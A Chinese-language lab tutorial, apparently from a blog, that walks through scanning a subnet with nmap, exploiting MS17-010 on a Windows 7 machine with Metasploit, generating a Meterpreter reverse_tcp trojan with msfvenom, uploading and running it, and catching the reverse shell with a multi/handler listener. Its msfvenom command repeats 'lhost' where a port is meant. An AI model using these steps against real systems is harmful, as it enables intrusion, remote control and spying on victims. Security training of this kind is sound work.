免责声明:
本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!
实验材料准备
kali linux,下载地址:www.kali.org/
windows系统,请自行寻找
一、制作木马程序
使用msf工具生成木马,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[kali的ip] lhost=[端口号] -f exe > [路径及程序名].exe
二、开始测试
- 本实验木马不同于安卓木马,不需要二次加工,可以直接使用
1. 寻找目标
首先使用nmap扫描当前网段下活跃的主机:
可以看到192.168.234.128这个ip是活跃的并且开启了445端口,使用nmap -O
命令查看该主机系统信息:
可以看到该地址下运行的是win7系统
2. 尝试突破
尝试以ms17-010
漏洞攻击该地址,步骤如下;
-
启动
msfconsole
并选择该漏洞的攻击模块: -
测试该漏洞的可行性:
-
测试结果为可行,设置参数准备攻击:
输入options
指令检查参数设置:
确认无误后输入run
指令开始运行:
攻击成功
3. 植入并运行木马
上传通过msfvenom
指令生成的木马,命令如下:
upload [木马的路径和程序名].exe [靶机的接收路径]
打开win7靶机可以看到上传成功:
- 在kali中打开一个新的命令行窗口,启动
msfconsole
,并配置监听模块,指令如下:
use exploit/multi/handler //启用监听模块
set payload windows/meterpreter/reverse_tcp //设置payload
set LHOST [kali的ip]
set LPORT [端口号]
监听已开启
- 在利用漏洞攻击的窗口中启动上传的木马,步骤与命令如下:
shell //进入win7系统的命令行
chcp 65001 //设置显示编码
start [木马名称].exe //cd到木马位置后输入此命令开始运行木马
此时新命令行窗口接收到信号开始监听
- 输入
screenshot
指令截图一张:其余指令请自行尝试
实验结束
再次声明:
本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!
- 完成本实验后请立刻清除制作的所有木马程序,禁止传播流出!